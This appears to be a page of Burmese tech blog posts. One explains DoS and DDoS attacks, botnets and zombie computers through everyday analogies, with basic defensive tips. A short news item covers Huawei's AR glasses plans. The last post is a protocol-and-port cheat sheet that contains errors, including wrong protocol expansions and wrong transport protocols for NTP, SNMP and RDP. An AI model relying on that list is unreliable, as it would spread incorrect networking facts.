DoS တုိက္ခုိက္မႈမွာ သတ္မွတ္ထားတဲ႔ Targeted System (Victim) နဲ႔ ၄င္း System ရဲ႕ Port, network component, firewall ကုိ အတိအက်ေရြးခ်ယ္ တုိက္ခုိက္တာၿဖစ္တဲ႔ အၿပင္ printer ေတြ Alarm System ေတြၿပတ္ေတာက္သြားေအာင္ တုိက္ခုိက္တာလည္းရွိပါတယ္....

ဒါေၾကာင့္ DoS အတုိက္ခံရၿပီဆုိရင္
* Network ရဲ႕ စြမ္းရည္က်ဆင္းလာၿခင္း (ေႏွးေကြးလာၿခင္း)
* Website မ်ားကုိ အသုံးၿပဳတဲ႔အခါ အသုံးၿပဳ၍ မရၿခင္း (တုိက္ခုိက္တဲ႔သူက http server ကုိ request အေၿမာက္အမ်ားေတာင္းဆုိၿခင္းေၾကာင့္)
* spam mail ေတြ အ၀င္မ်ားလာၿခင္း ( Mail Server ပ်က္စီးမယ္/တုိက္ခုိက္သူက အခ်ိန္တုိအတြင္းမွာ ေမးလ္ေတြ ေထာင္ေပါင္းမ်ားစြာကုိ victim အားပုိ႔ေဆာင္ေသာေၾကာင့္)
* Computer or Webserver မ်ားရဲ႕ CPU & Memory Usage ေတြ ၿမင့္တက္ေနၿခင္းတုိ႔ကုိေတြ႔ရႏုိင္ပါတယ္။


တုိက္ခုိက္ပုံ

DoS ရဲ႕ တုိက္ခုိက္ပုံကေတာ့ Peer to Peer တုိက္ခိုက္သလုိပါပဲ... အထူးၿပဳလုပ္ထားတဲ႔ DoS Tool ေတြနဲ႔ Vitim ရဲ႕ host သုိ႔မဟုတ္ ip address and port ေတြကုိ အခ်ိန္တုိ အတြင္းမွာ request ေပါင္းမ်ားစြာေတာင္းဆုိ အသုံးၿပဳၿခင္းပဲၿဖစ္ပါတယ္။

တုိက္ခုိက္တဲ႔ မႈကြဲေတြကေတာ့
* ICMP Flood
* Teardrop Attack
* Peer-to-Peer Attack
* Permanent Denial of Service
* Application Level Floods (IRC Floods)
* Nuke
* Distributed Attack
* Reflected Attack
* Degradation-of-Service
* Unintentional Denial of Service
* Denial of Service Level II
* Blind Denial of Service

DDoS ( Distributed Denial of Service) ဆုိတာ DoS ရဲ႕ Advanced Version တစ္ခုလုိ႔ ဆုိႏုိင္ပါတယ္။ ပစ္မွတ္ Server တစ္ခုကုိ flooding packets ေပါင္းမ်ားစြားအာ
single network တစ္ခုကတင္ မဟုတ္ပဲနဲ႔ Multiple host or network ေတြကေနတုိက္ခုိက္တာပါ။ DDoS က ယေန႔ေခတ္အတြက္ ကုရာ နတၳိေဆးမရွိသလုိၿဖစ္ေနၿပီး မိမိသုံး
တဲ႔ Server ရဲ႕ Security အားနည္းတာလည္း ၿဖစ္နိင္သလုိ site ရဲ႕ security ေစာင့္ၾကည့္မူ႔ေတြအားနည္းမူ႔ေၾကာင့္လည္း ၿဖစ္ပါတယ္။


ဘယ္လုိပဲၿဖစ္ေစ DoS နဲ႔ DDoS ကုိကၽြန္ေတာ္တုိ႔ ထပ္ၿပီး အနည္းငယ္ အက်ယ္ခ်ဲ႕ ၾကည့္ရေအာင္.. ကၽြန္ေတာ္က လူတစ္ေယာက္ကုိ စိတ္ပုိင္းဆုိင္ရာ ေႏွာက္ယွက္ခ်င္တယ္ဆုိရင္ အဲ႔လူရဲ႕ ဖုန္းနံပါတ္ကုိေကာက္ႏုိပ္လုိက္မယ္.. ၿပီးရင္ အဲ႔လူနားေထာင္ေလာက္တဲ႔ အခ်ိန္က်မွ ဖုန္းကုိ ေကာက္ခ်လုိက္မယ္.. ဒီလုိအၾကိမ္အေရအတြက္ မ်ားလာခဲ႔မယ္ဆုိရင္ တစ္ဖက္ကလူလည္းအေႏွာက္အယွက္ၿဖစ္မယ္... စိတ္ညစ္မယ္ေပါ႔.. ဒါဟာ Attacker to Victim တုိက္ရုိက္ ဆက္ႏြယ္တဲ႔ DoS နည္းလမ္းပဲ... ဒါေပမဲ႔ Victim က နည္းပညာေကာင္းၿပီး Attacker ရဲ႕ ဖုန္းနံပါတ္ေလးတစ္ခုတည္းကုိပဲ Block လုပ္ထားလုိက္မယ္ဆုိရင္ Attacker က ေခၚလုိ႔ရမွာမဟုတ္ေတာ့ဘူး ... ဒီလုိအခ်ိန္မွာ Attacker က ထပ္ေလာင္း၍ တစ္ၿခားနည္းလမ္းကုိသုံးလာလိမ့္မယ္.. အဲ႔ဒါကေတာ့ Radio Station ေတြကေနၿပီးေတာ့ လာမည့္ဘယ္ေန႔ ဘယ္အခ်ိန္မွာ ဘယ္ပြဲအတြက္ လက္မွတ္ေတြကုိ ေစ်းႏႈန္းခ်ဳိသာစြာေရာင္းခ်ေနတယ္... ေနာက္ထပ္ ဘယ္ေနရာမွာ အႏၱရာယ္နဲ႔ေတြ႔ေနတယ္.. ဒီလုိ Fade ေတြကုိ Victim နဲ႔ သတ္ဆုိင္တဲ႔သူေတြကုိ သတင္းေပးလုိက္မယ္ဆုိရင္ Victim ရဲ႕ မိတ္ေဆြအေပါင္းအသင္းေတြကလည္း Victim ကုိ တစ္ေယာက္ၿပီးတစ္ေယာက္ ဖုန္းဆက္ အေၾကာင္းၾကား အသိေပးေနေတာ့မွာပါပဲ.. ဒါက Distributed လုပ္တယ္လုိ႔ ေခၚတယ္.. တစ္နည္းအားၿဖင့္ DDoS ေပါ႔...

Distributed လုပ္တဲ႔ေနရာမွာ Attacker (Hacker) ေတြက Malware, Virus ေတြနဲ႔ၿဖစ္ေစ Fade Mail, Social Engineering နဲ႔ၿဖစ္ေစ အြန္လုိင္းကုိ ၿဖန္႔လုိက္ပါတယ္... ၄င္း Attacker ရဲ႕ Malware,Virus ေတြ မိမိစက္ထဲကုိေရာက္လာတာပဲၿဖစ္ေစ Social Engineering နဲ႔ေရာက္လာတာပဲ ၿဖစ္ေစ မိမိရဲ႕ စက္ဟာ Attacker ရဲ႕ အသုံးခ်ခံၿဖစ္သြား ပါၿပီ... ဒါကုိ Zombie လုိ႔ေခၚပါတယ္... ဒီ Zombie ေတြဟာ ဟက္ကာေတြရဲ႕ ခုိင္းေစတာကုိ လုပ္ေဆာင္ဖုိ႔ အခ်ိန္တုိင္းအသင့္ရွိေနၾကပါတယ္... ဒီလုိအြန္လုိင္းမွာ ဟက္ကာေတြ ရဲ႕ အသုံးခ်ခံေနရတဲ႔ Zombie ေတြက မနည္းပါဘူး။ ဒီအခ်ိန္မွာ တုိက္ခုိက္မဲ႔ Attacker (Hacker) က ၄င္းရဲ႕ Zombie ေတြကုိ အခ်ိန္၊ ေနရာ ေတြကုိ ညြန္ၾကားေပးလုိက္တာနဲ႔ Victim ကုိ အားလုံး Fade Request, Fade Mail ေတြ ပုိ႔ေဆာင္ၾကတာပါပဲ...

Fade Mail ဆုိတာက Mail Bomber ပုံစံမ်ဳိး တစ္ၾကိမ္မွာ ေမးလ္ေပါင္း ေသာင္းနဲ႔ ခ်ီၿပီး ပုိ႔ေဆာင္ႏုိင္သလုိ ၄င္းကုိ Distributed လုပ္ၿပီးတုိက္ခုိက္တာလည္းရွိပါတယ္... သာမာန္ user တစ္ေယာက္က ထုိသူသြားလည္တဲ႔ Website (
www.abc.com) တစ္ခု ရွိတယ္ဆုိၾကပါစုိ႔ .. Attacker က ၄င္းရဲ႕ Website မွာ စိတ္၀င္စားစရာ ေၾကာ္ၿငာေလး တစ္ခုထည့္ထားမယ္ ... ဒီအခ်ိန္မွာ ၄င္း site (www.abc.com) ကုိလာေရာက္လည္ပတ္တဲ႔သူေတြက ၄င္း ေၾကာ္ၿငာ္ေလးကုိ ႏုိပ္လုိက္တုိင္းမွာ Attacker ၾကိဳတင္သတ္မွတ္ ထားတဲ႔ Victim ရဲ႕ mail server ကုိ ေမးလ္ေပါင္း ေၿမာက္မ်ားစြာ ပုိ႔ၾကပါလိမ့္မယ္... ဒီလုိအခ်ိန္မွာ တစ္ဖက္က SMTP/POP စသည့္ Mail Server ေတြက Down သြားႏုိင္ပါ တယ္။

ဒါဟာ ရုိးရွင္းတဲ႔ တုိက္ခုိက္မႈပဲရွိပါေသးတယ္...DoS and DDoS တုိက္ခုိက္မႈမွာ 'packet-forgery' ေခၚတဲ႔ packet အတုအေယာင္ ဖန္တီးၿခင္း၊ 'IP spoofing' ေခၚတဲ႔ IP Address ကုိ packet နဲ႔အတူေၿပာင္းလဲၿခင္း စသည္အမ်ားၾကီးရွိပါေသးတယ္..

ဒီေနရာမွာ Ethernet ဆုိတာကုိ နဲနဲေလး လူဗိန္းနားလည္ေလာက္တဲ႔ ပုံစံနဲ႔ ေၿပာပါမယ္.. Ethernet ရဲ႕ System ေတြဆက္သြယ္မႈမွာ "packets" frames ေလးေတြ ကရွိပါတယ္ အဲ႔ frame ထဲ destination address, source address type field and data ေလးေတြပါ၀င္ပါတယ္... Ethernet address က 6 bytes ရွိၿပီး ၄င္းတုိ႔ရဲ႕ ကုိယ္ပုိင္ Ethernet Address တစ္ခုစီ ရွိၾကပါတယ္။ Ethernet က အသုံးၿပဳတာက CSMA/CD (Carrier Sense and Multiple Access with Collision Detection) ကုိအသုံးၿပဳတာၿဖစ္တဲ႔အတြက္ ၄င္းတုိ႔က Data တစ္ခုပုိ႔ေတာ့မယ္ဆုိရင္ ၄င္းပုိ႔မယ့္ Destination လမ္းေၾကာင္းေပၚမွာ သူပုိ႔ေဆာင္တဲ႔ Data ေတြ ရွိမရွိစစ္ပါတယ္... ရွိေသးရင္ ေခတၱခဏ ေစာင့္ၿပီးမွ ထပ္ပုိ႔ပါ တယ္... ဒီလုိလုပ္တာကုိ Collision Detection လုပ္တယ္လုိ႔ေခၚပါတယ္.. ဒီေတာ့ တစ္ခါပုိ႔ႏုိင္ၿပီး လက္ခံတာကေတာ့ အဆက္မၿပတ္လက္ခံႏုိင္တယ္ဆုိတဲ႔ သေဘာေပါ႔....

ဒါကုိ ဥပမာတစ္ခုထပ္ေပးမယ္... Ethernet technology ဆုိတာ အေမွာင္ခန္းထဲမွာ လူေတြ၀ုိင္းဖြဲ႕ စကားေၿပာတာနဲ႔တူပါတယ္... အခန္းထဲမွာဘယ္သူေၿပာေၿပာ အားလုံးက ၾကားပါတယ္.. ဒါက Carrier Sense ၿဖစ္ပါတယ္။ အခန္းထဲက လူတုိင္းက သူတုိ႔ စိတ္ဆႏၵရွိရင္ ေၿပာဆုိႏုိင္ပါတယ္.. ဒါက Multiple Access ၿဖစ္ပါတယ္.. ဒါေပမဲ႔ေၿပာတဲ႔သူ ေတြတုိင္းက ယဥ္ေက်းသိမ္ေမြ႔တဲ႔အတြက္ စကားေၿပာတဲ႔ ေနရာမွာ ဆင္ၿခင္ၾကတယ္ေပါ႔... အကယ္၍ တစ္ေယာက္က စကားေၿပာတဲ႔အခါမွာ ေနာက္တစ္ေယာက္က ပထမတစ္ ေယာက္ရဲ႕ စကားအၿပီးကုိေစာင့္ၾကၿပီး ဘာမွမေၿပာပါဘူး... ဒါက Collision Detection ၿဖစ္ပါတယ္။ အခန္းထဲမွာ ရွိတဲ႔ လူေတြမွာ နာမည္ကုိယ္စီရွိၾကပါတယ္.. ဒါက unique Ethernet address ၿဖစ္ပါတယ္... ဒီအခ်ိန္မွာ အခန္းထဲက လူတစ္ေယာက္က " Hello, brb, I'm PlanetCreator " လုိ႔ေၿပာရင္ ဒါက Ethernet destination and source
address ၿဖစ္ပါတယ္... ေၿပာမဲ႔သူက အားလုံးကုိ ေၿပာခ်င္တယ္ဆုိရင္ "Hello everyone, I'm PlanetCreator" လုိ႔ေၿပာပါလိမ့္မယ္.. ဒါက Broadcast Message လုိ႔ေခၚပါတယ္ အၿဖစ္အမ်ားဆုံးကေတာ့ ဒီအခန္းထဲမွာ ရွိတဲ႔သူေတြအားလုံးက တစ္ေယာက္ကုိ တစ္ေယာက္ ယုံၾကည္တဲ႔အတြက္ စကားကုိ လ်ဳိ႕၀ွက္ခ်က္မပါပဲ ပြင့္ပြင့္လင္းလင္းေၿပာၾကပါ တယ္... ဒါက non-encrypted data communication is common ၿဖစ္ပါတယ္..

ဒီအခ်ိန္မွာ အခန္းထဲကုိ လူစိမ္းတစ္ေယာက္က ၀င္လာတယ္ဆုိပါစုိ႔ ဒါကုိ (has tapped that Ethernet segment) လုိ႔သတ္မွတ္မယ္... အထဲမွာေၿပာတဲ႔သူေတြအားလုံးက လ်ဳိ႕၀ွက္ခ်က္မရွိပဲေၿပာသလုိ ၀င္ေရာက္လာတဲ႔ လူစိမ္းကလည္း စကား၀ိုင္းကုိ မေႏွာက္ယွက္ပဲ ထုိင္ၿပီးနားေထာင္ေနမယ္ .. ဒါကုိ Sniffing လုပ္တယ္လုိ႔ေခၚမယ္... ၿပီးရင္ အခန္းထဲက ၿပန္ထြက္သြားမယ္... ဘာမွေႏွာက္ယွက္မႈမလုပ္ခဲ႔တဲ႔အတြက္ သူ႔ကုိ Detect လုပ္ဖုိ႔ခက္ပါတယ္.. ဒီေလာက္ပါပဲ...

ဒီအခ်ိန္မွာ ၀င္ေရာက္လာတဲ႔ လူစိမ္းက အဆက္မၿပတ္ေၿပာေနမယ္ဆုိရင္ ဒါက DoS to that segment of the Ethernet ၿဖစ္တယ္လုိ႔ေခၚၿပီး သူတစ္ေယာက္တည္းတင္သာမ က အၿခားသူမ်ားကုိပါ စကားေတြ တစ္ၿပိဳင္နက္ထဲေၿပာေအာင္ လုပ္တယ္ဆုိရင္ DDoS ေပါ႔... ၿပီးရင္ အခန္းတစ္ခုလုံး လက္ပံပင္ဇရပ္ၿဖစ္သြားေတာ့ စကား၀ုိင္းေခၚတဲ႔ server ပ်က္ၿပီေပါ႔...

လူစိမ္းက ခဏကလုိ စကားေတြေၿပာတဲ႔အခါ အၿခားသူတစ္ေယာက္လုိ အသံမ်ဳိးနဲ႔ ထၿပီး စကားေၿပာမယ္.. ေနာက္တစ္ခါ ေနာက္တစ္ေယာက္ ေလသံနဲ႔ အသံတုလုပ္ေၿပာမယ္ ဆုိရင္ ဒါက IP Spoofing လုပ္တယ္ေခၚတယ္... ၿပီးရင္ ေနာက္တစ္ေယာက္ကုိ နာမည္အတုနဲ႔ စကားေတြေၿပာေနမယ္ဆုိရင္ packet forgery လုိ႔ေခၚတယ္...

သာမာန္အတြက္ Attacker (Hacker) က How are you ? ဆုိတဲ႔ ေမးလ္ခြန္းကုိ Server (Victim) က I'm fine ဆုိၿပီးတစ္ခါေၿဖႏုိင္ပါတယ္။ ဒါေပမဲ႔ Attacker ဖန္တီးထားတဲ႔ Zombie ေတြက တစ္ခ်ိန္တည္း တစ္ၿပိဳင္တည္း How are you? How are you? How are you? ဆုိၿပီး အုံလုိက္ေမးတဲ႔အခါ server က တစ္ေယာက္ကုိေၿဖၾကားေပးၿပီး ေနာက္တစ္ေယာက္ကုိ ေၿဖၾကားေပးဖုိ႔ လုပ္ေဆာင္ရပါတယ္... ဒီလုိေၿဖၾကားေနရတာမ်ားေတာ့ CPU ေတြ RAM ေတြက မခံႏုိင္ေတာ့ပါဘူး။ ဒါေၾကာင့္ ဆက္သြယ္မႈေတြ ၿပတ္ေတာက္သြားတာပါ။ Server Overload ၿဖစ္ၿပီး Data ေတြ ဆုံးရႈံးတဲ႔အထိ ၿဖစ္တတ္ပါတယ္။


DoS or DDoS attack ကုိဘယ္ကုိကာကြယ္မလဲ ဆုိတာကေတာ့ ရာႏႈန္းၿပည့္ကာကြယ္ႏုိင္တဲ႔ နည္းလမ္းကုိ မေတြ႔ေသးပါဘူး။ ဒါေပမဲ႔ ေကာင္းမြန္တဲ႔နည္းလမ္းတစ္ခ်ဳိ႕ေတာ့ရွိပါ တယ္...

* အၿမဲတမ္းမိမိရဲ႕ anti virus program ကုိ update လုပ္ေပးပါ
* Firewall အားမွန္ကန္၍ တင္းၾကပ္ေသာ rule မ်ားသတ္မွတ္ပါ...
* မိမိကြန္ပ်ဴတာမွာ မလုိအပ္တဲ႔ Intenet Port Number ေတြကိုပိတ္ပါ.. ကြန္ပ်ဴတာရဲ႕ Port ကုိစစ္ရန္
http://www.auditmypc.com/firewall-test.asp
* Email အား စနစ္တစ္က်အသုံးၿပဳပါ... mail filtering ကုိအသုံးၿပဳပါ...
ဒီအတြက္ အဓိက အေနနဲ႔ကေတာ့ Firewall ကုိထပ္ၿပီးေၿပာပါမယ္.. Firewall မွာ Hardware Firewall နဲ႔ Software Firewall ဆုိၿပီးရွိပါတယ္...


Hardware Firewall

ဒါကုိ Network Firewall လုိ႔လည္းေခၚၿပီး ယေန႔ေခတ္ ေနာက္ဆုံးေပၚ ADSL Router ေတြမွာ တစ္ခါတည္းတြဲၿပီးပါလာတတ္ပါတယ္... Coporate လုပ္ငန္းေတြဆုိရင္ေတာ့ Firewall Router တစ္ခုကုိ သီးသန္႔၀ယ္ၿပီး ဆင္ထားတတ္ၾကပါတယ္... Software Firewall ထက္စာရင္ Hardware Firewall ကပုိၿပီးေကာင္းမြန္ပါတယ္..

ေနာက္တစ္ခုက ဒါကေတာ့ DoS or DDoS ေတြကုိ ကာကြယ္ဖုိ႔ ေကာင္းမြန္တဲ႔ Server ဖြဲ႕စည္းမႈတစ္ခုပါပဲ... အထဲမွာ Hardware Firewall အၿပင္ Load Balancer ဆုိတာကုိပါထည့္ထားပါ တယ္...

Load Balancer ကုိၿပထားတာပါ...
အားလုံးကုိ အက်ဥ္းခ်ဳပ္ၿပီးေၿပာရမယ္ဆုိရင္ DoS ဆုိတာ Attacker ကေန Victim ကုိ တုိက္ရုိက္တုိက္ခုိက္တယ္.. DDoS ဆုိတာကေတာ့ ၾကားခံ Zombie ကုိေမြးၿပီး တုိက္ခုိက္ တယ္... ဒီေလာက္ပါပဲ...


Zombie & Botnet

Zombies ဆုိတာ ဟက္ကာရဲ႕ အသုံးခ်ခံတစ္ခုၿဖစ္ၿပီး Victim ကုိ ဟက္ကာရဲ႕ ခုိင္းေစခ်က္အတုိင္း တုိက္ခုိက္ရတာၿဖစ္ပါတယ္.. ဒါေၾကာင့္ Zombie ရတယ္ဆုိတာ malware ရတာလုိ႔ဆုိႏုိင္ပါတယ္.. Malware (zombie) ရထားတဲ႔ ကြန္ပ်ဴတာဟာ

* Sending spam
* Hack other computers
* Denial of service attacks
* Advertisement click fraud
* Phishing websites

စသည္တုိ႔ကုိလုပ္ေဆာင္ၾကပါတယ္..

၄င္း Malware, trojan, virus ဟာ အသုံးခ်ခံကြန္ပ်ဴတာအတြင္း၀င္ေရာက္ၿပီး အထဲမွာရွိတဲ႔ Security ေတြ၊ Antivirus ေတြကုိ ပိတ္ကာ Hacker အေနနဲ႔ Additional Programေတြ ထည့္သြင္းလုိ႔ရေအာင္၊ ၀င္ထြက္လုိ႔ရေအာင္ လမ္းဖြင့္ေပးပါတယ္... ဒီေတာ့ ၄င္း ကြန္ပ်ဴတာက Hacker ရဲ႕ အသုံးခ်ခံလုံးလုံးၿဖစ္ၿပီး လုိအပ္တဲ႔အခါ အသုံးၿပဳလုိ႔ရေအာင္ Hacker ေတြက ၄င္း Zombie ေလးေတြကုိ စုထားတတ္ပါတယ္... ဒါကုိ botnet လုိ႔ေခၚဆုိႏုိင္ပါတယ္.. bot ဆုိတဲ႔အဓိပၸါယ္ကလည္း Robot လုိ Artificial Intelligence ေပါ႔... အခုလုိ Trojan ေတြမ်ားလာခဲ႔ရင္ ေစလုိရာေစ ခုိင္းလုိ႔ရပါၿပီ... ဟက္ကာေတြက Zombie ေတြသုံးၿပီးတုိက္ခုိက္လုိက္ေတာ့ သူတုိ႔ကုိ လုိက္လံ Trace လုိက္ရတာ ခက္သြားတာ ေပါ႔...

မိမိစက္က Zombie ၿဖစ္ေနၿပီဆုိရင္ေတာ့

၁။ မိမိ RUN လုိက္တဲ႔ programs ေတြက ေႏွးလာမယ္။
၂။ services ေတြ (ဥပမာ http) high rate က်လာမယ္။
၃။ မ်ားၿပားလွေသာ connection requests ေတြဟာ ကြဲၿပားတဲ႔ Networks ေတြကေန ၀င္လာမယ္။
၄။ မိမိရဲ႕ site ကုိလာေရာက္အသုံးၿပဳသူေတြက site ကုိ အသုံးၿပဳတဲ႔ ေနရာမွာ ေႏွးမယ္။
၅။ မိမိရဲ႕ စက္ဟာ CPU load ၿမင့္ေနလိမ့္မယ္။

#C_M_H

Sunday, November 18, 2018

လာမယ့္ ၂ ႏွစ္အတြင္းတြင္ AR စမတ္မ်က္မွန္ ထုတ္လုပ္လာမယ့္ Huawei

နည္းပညာေလာကတစ္ခုလံုး AR သုိ႔ ခ်ီတက္လ်က္ရွိပါတယ္။ အထူးသျဖင့္ ထိပ္သီးနည္းပညာကုမၸဏီမ်ားက စမတ္ဖုန္းေခတ္ကုန္ဆံုးၿပီး AR စမတ္မ်က္မွန္ တေခတ္ထြန္းလာမယ္လုိ႔ ယံုၾကည္ေနၾကပါတယ္။ AR လုပ္ေဆာင္ေနတဲ့ ကုမၸဏီေတြထဲမွာ Huawei လည္း ပါ၀င္ပါတယ္။ Huawei ဟာ Mate 20 Pro မွာ AI ႏွင့္ AR တို႔ ထည့္သြင္းထားပါတယ္။ Huawei ကလည္း စမတ္ဖုန္းေလာကမွာပဲ ေနခ်င္တဲ့ ကုမၸဏီမ်ဳိးမဟုတ္ပါဘူး။ R&D အတြက္ ေငြေၾကးဘီလီယမ္ေပါင္းမ်ားစြာ သံုးေနတဲ့ ကုမၸဏီပီပီ Huawei ဟာ လာမယ့္ႏွစ္အနည္းငယ္အတြင္းမွာ AR စမတ္နာရီ ထုတ္လုပ္ ေရာင္းခ်ဖို႔ စီစဥ္ထားပါတယ္။
CNBC ႏွင့္အင္တာဗ်ဴးမွာ Huawei CEO ရစ္ခ်က္ယူက AR စမတ္မ်က္မွန္ထုတ္လုပ္ ေရာင္းခ်ဖုိ႔ လုပ္ေဆာင္ေနၿပီ ျဖစ္ၿပီး ႏွစ္အနည္းငယ္အတြင္းမွာ ေစ်းကြက္မွာ ေရာင္းခ်ဖို႔ အဆင္သင့္ျဖစ္လာမွာ ျဖစ္ေၾကာင္း ေျပာၾကားသြားပါတယ္။
Huawei ရဲ႕ AR စမတ္မ်က္မွန္ကလည္း Google ႏွင့္ Microsoft တို႔ရဲ႕ AR စမတ္မ်က္မွန္မ်ားလုိပဲ လုပ္ေဆာင္လာမွာ ျဖစ္ပါတယ္။ ဒါေပမယ့္ Huawei ရဲ႕ စမတ္မ်က္မွန္က Google နဲ႔ Microsoft တို႔ရဲ႕ စမတ္မ်က္မွန္ထက္ ပုိၿပီးေတာ့ အဆင့္ျမင့္လာဖုိ႔ ရွိပါတယ္။  Huawei ရဲ႕ စမတ္မ်က္မွန္က ပုိၿပီးေတာ့ အသံုးတည့္လာဖုိ႔ ေသခ်ာေနပါတယ္။
ဆက္လက္ၿပီး ရစ္ခ်က္ယူက လက္ရွိအခ်ိန္မွာ AR ေလာကက စတင္႐ံုမွ်သာ ရွိေနေသးေသာ္လည္း အနာဂတ္မွာ မ်ားစြာ အသံုးတည့္လာမယ့္စနစ္ ျဖစ္ေၾကာင္း ဆိုသြားပါတယ္။
တကယ္ေတာ့ AR ေစ်းကြက္က တျဖည္းျဖည္းႀကီးထြားလာဖုိ႔ ေသခ်ာေနပါတယ္။ Apple ကလည္း AR အတြက္ အႀကီးအက်ယ္ လုပ္ေဆာင္ေနပါတယ္။ Apple ဟာ Akonia Holographic ကုိ ၀ယ္ယူထားသလုိ Facebook ကလည္း AR စမတ္မ်က္မွန္ လုပ္ေဆာင္ေနတာ ၾကာျမင့္ၿပီ ျဖစ္ပါတယ္။
ကၽြမ္းက်င္သူမ်ားက ၂၀၂၂ ခုႏွစ္မွာ AR စမတ္မ်က္မွန္ ေစ်းကြက္မွာ ၂၁ သန္းအထိ ျမင့္တက္လာမယ္လုိ႔ ခန္႔မွန္းထားၾကပါတယ္။

Thursday, November 8, 2018

Application Layer 


ေလ့လာမွတ္သား နည္းပညာအေျကာင္းမ်ား
Application Layer အေျကာင္းအတိုေကာက္အသုံးအႏႈန္းမ်ား ႏွင့္ စာစုအျပည့္အစုံမ်ား သိ့ရွိေစရန္

HTTP - Hypertext Transfer Protocol
(Port No: - 80/TCP)

HTTPS - Hyperext Transfer Protocol Secure  (Port No: - 443/TCP)

TELNET-  Terminal Network
(Port No:- 23/TCP)

SSH - Secure shell
(Port No:- 22/TCP)

FTP - File Transfer Protocol
(Port No:- 20/21/TCP)

RDP - Remote Desktop Protocol
(Port No:- 3389/UDP)

TFTP - Trivial File Transfer Protocol
 (port No:- 69/UDP)

DHCP - Dynamic Host Configuration Protocol (Port No:- 67/68/UDP)

DNS- Domain Name service
(Port No- 53/TCP/UDP)

SNMP- Simple Network Management Protocol (Port No:- 161/162/TCP)

SMTP- Simple Mail Translate Protocol
(Port No:- 25/TCP)

POP3:- Port Office Protocol
(Port No:- 110/TCP)

IMAP- Internet Massage Access Protocol (Port No:- 143/TCP)

NTP- Network Time Protocol
(Port No:- 123/TCP)


LDAP- Light Wight Directory Access Protocol (Port No:- 389/TCP)

မဂၤလာအေပါင္းႏွင့္ျပည့္စုံျကပါေစ ဝင္ေရာက္ေလ့လာ မိတ္သဟာ ခ်မ္းသာကိုယ္စိတ္ျမဲပါေစ
#ေမာင္ခါး